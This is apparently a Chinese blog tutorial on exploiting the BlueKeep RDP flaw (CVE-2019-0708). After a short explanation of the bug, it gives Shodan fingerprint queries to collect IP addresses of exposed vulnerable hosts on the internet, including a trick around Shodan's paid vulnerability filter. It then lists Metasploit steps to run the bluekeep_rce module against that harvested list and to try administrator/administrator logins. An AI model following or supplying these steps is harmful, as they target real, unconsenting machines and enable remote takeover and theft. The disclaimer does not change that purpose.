免责声明:本教程作者及相关参与人员对于任何直接或间接使用本教程内容而导致的任何形式的损失或损害,包括但不限于数据丢失、系统损坏、个人隐私泄露或经济损失等,不承担任何责任。所有使用本教程内容的个人或组织应自行承担全部风险。
以CVE-2019-0708漏洞为例
漏洞原理:
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。
这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性
影响版本:
Windows 7、Windows Server 2008、Windows Server 2008 R2、Windows Server 2003、Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影响>
类似于指纹的方式查找:
\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00 >> 十六进制漏洞特征
命令:shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
有漏洞不代表可以利用
1.windows远程连接,看主机是否存活。远程连接出现,测试弱口令administrator(账号密码都是)
2.新建0708.txt,将扫描出来的IP地址粘贴进去,删掉端口信息,再拖到kali中
3.打开msfconsole,使用命令search 0708
4.use explort/windows/rdp/cve_2019_0708_bluekeep_rce(explort/windows/rdp/cve_2019_0708_bluekeep_rce是一个利用脚本,可以在上一步的操作里面找到)
5.show options
6.set rhosts file:+目标的文件路径(将0708.txt文件拖入命令后面即可)
7.check
附:
1.测完之后可以执行show options命令
2.payload的ip端口一定要填对
3.show targets 支持windows7,sever这种,得把targets设置正确
接下来是shodan另外两个参数
parse和download(解压和下载)
shodan download -h 查看帮助文档
shodan download 0708(文件名) --limit 10 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00 "'(删除过滤信息)
shodan parse -h 查看帮助文档
shodan parse --fields ip_str 0708>0708.txt 解压缩
shodan search vuln:cve2019-0708用不了,用前面的方法
Vuln 需要更高级别用户才能用,可以使用上面的方法进行绕过
标签:shodan,Windows,红队,Shodan,漏洞,0708,SEC,--,x00 From: https://blog.csdn.net/weixin_43433141/article/details/143309874